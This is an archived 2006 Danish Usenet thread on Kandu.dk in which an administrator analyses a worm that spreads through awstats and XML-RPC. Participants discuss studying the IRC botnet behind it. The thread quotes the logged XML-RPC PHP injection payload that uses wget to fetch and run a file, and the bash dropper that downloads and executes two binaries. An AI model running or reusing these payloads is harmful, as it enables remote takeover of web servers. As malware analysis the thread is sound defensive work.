Kandu.dk - Se mor, jeg har fanget en Fraggel!


/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

Sikkerhed

#	Navn	Point
1	stl_s	37026
2	arlet	26827
3	miritdk	20260
4	o.v.n.	12167
5	als	8951
6	refi	8694
7	tedd	8272
8	BjarneD	7338
9	Klaudi	7257
10	molokyle	6481

Se mor, jeg har fanget en Fraggel!
Fra : Niels Callesøe

Dato : 09-01-06 20:54

Haps. Så fik jeg den langt om længe. Der er åbenbart en
auto-rooter/zombie der spreder sig via hhv. en fejl i awstats og
xmlrpc (fra et eller andet stykke blogware), så vidt jeg med mine
begrænsede kundskaber kan komme frem til.

Jeg ville normalt ikke interessere mig sønderligt for orm-du-jour,
men Giggle kender ikke noget til den her fætter, og så bliver man jo
nysgerrig.

Anyway, jeg startede med at konstatere et lidt særpræget POST til
xmlrpc.php i min log, konfigurerede lidt ekstra logging, og kunne så
konstatere at der åbenbart findes en mere eller mindre kendt sårbarhed
der i nogle situationer kan medføre afvikling af kode -- kaldet ser
således ud:

2006-01-09 10:53:17 Input: <?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 000.000.000.000/killos;chmod +x killos;./killos `;echo '_end_';exit;/*</name></value></param></params></methodCall>

.... hvor IP adressen (her udskiftet med 4x000) der hentes fra
selvfølgelig skifter fra zombie til zombie, og det gør navnet på det
script der hentes også.

De første par gange hvor jeg har forsøgt at snuppe en kopi af
scriptet til analyse, har det manglet eller den pågældende maskine
har ikke svaret. Men her til aften prøvede jeg så lige igen, og så
var der bid. Scriptet er en helt basic dropper:

$ cat killos
#!/bin/bash
wget 000.000.000.000/nikonhome
chmod 744 nikonhome
../nikonhome
wget 000.000.000.000/kis
chmod 755 kis
../kis

.... hvor nikonhome tilsyneladende er en IRC-client af en eller anden
art, og nikonhome er "selve" ormen (begge dele er konstateret ved
hjælp af strings(1)). Man kan selvfølgelig meget let forestille sig
at ogås 'kis' og 'nikonhome' bare er tilfældige navne der ændrer sig
fra installation til installation.

Det kommer nok ikke som nogen overraskelse at IRC-klienten
tilsyneladende forbinder til undernet for at finde sin botmaster.

Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der er
et eller flere af gruppens faste bidragsydere der skulle have lyst til
at kigge nærmere på den, så sig endelig til.

--
Niels Callesøe - dk pfy @work
pfy[at]nntp.dk - http://www.t29.dk/~nica/disclaimer.php

This space for rant.

Christian E. Lysel (09-01-2006)

Kommentar
Fra : Christian E. Lysel

Dato : 09-01-06 21:30

Niels Callesøe wrote:
> Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der er
> et eller flere af gruppens faste bidragsydere der skulle have lyst til
> at kigge nærmere på den, så sig endelig til.

Prøv i et selvstændigt miljø at starte IRC klienten og have en sniffer
kørende.

Herefter kan du selv manuelt kontakte IRC serveren .... der bliver så
hurtigt tomt for mennesker ...

Niels Callesøe (09-01-2006)

Kommentar
Fra : Niels Callesøe

Dato : 09-01-06 22:22

Christian E. Lysel wrote in
<news:43c2c7b9$0$1775$edfadb0f@dread11.news.tele.dk>:

>> Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der
>> er et eller flere af gruppens faste bidragsydere der skulle have
>> lyst til at kigge nærmere på den, så sig endelig til.
>
> Prøv i et selvstændigt miljø at starte IRC klienten og have en
> sniffer kørende.
>
> Herefter kan du selv manuelt kontakte IRC serveren .... der bliver
> så hurtigt tomt for mennesker ...

Mjaeh, undernet bliver nok ikke tømt bare fordi et eller andet botnet
er nød til at skifte kanal. ;)

Faktisk tror jeg tricket ville være at have 2 klienter kørende, så man
fra den ene kunne holde øje med hvor den anden bliver omdirrigeret til.

Men, helt ærligt, så har jeg sgu for meget andet at lave i mit liv til
at jeg gider bruge tid på at dukke mig i ugevis for en eller anden
pissed-off kiddie med et botnet. Jeg synes heller ikke jeg hører dig
melde dig frivilligt...

--
Niels Callesøe - dk pfy @work
pfy[at]nntp.dk - http://www.t29.dk/~nica/disclaimer.php

This space for rant.

Christian E. Lysel (10-01-2006)

Kommentar
Fra : Christian E. Lysel

Dato : 10-01-06 00:20

Niels Callesøe wrote:
> Mjaeh, undernet bliver nok ikke tømt bare fordi et eller andet botnet
> er nød til at skifte kanal. ;)

Jeg mente en kanal.

bot'erne i kanalen går "tabt", da de typisk er hardkodet.

> Faktisk tror jeg tricket ville være at have 2 klienter kørende, så man
> fra den ene kunne holde øje med hvor den anden bliver omdirrigeret til.

Hvis en klient skal omdirrigeres, hvilket jeg ikke har set før.

> Men, helt ærligt, så har jeg sgu for meget andet at lave i mit liv til
> at jeg gider bruge tid på at dukke mig i ugevis for en eller anden
> pissed-off kiddie med et botnet. Jeg synes heller ikke jeg hører dig
> melde dig frivilligt...

De har ikke før voldt mig problemmer, ikke andet end der blev lidt tomt,
udover bot'erne.

Efter følgende dukkede de aldrig op, det var interessant at se hvilke
adresser de kom fra. Diverse socks proxy servere rundt omkring.

Søg

Reklame

Statistik

Spørgsmål :	177558
Tips :	31968
Nyheder :	719565
Indlæg :	6408924
Brugere :	218888

Månedens bedste

Årets bedste

Sidste års bedste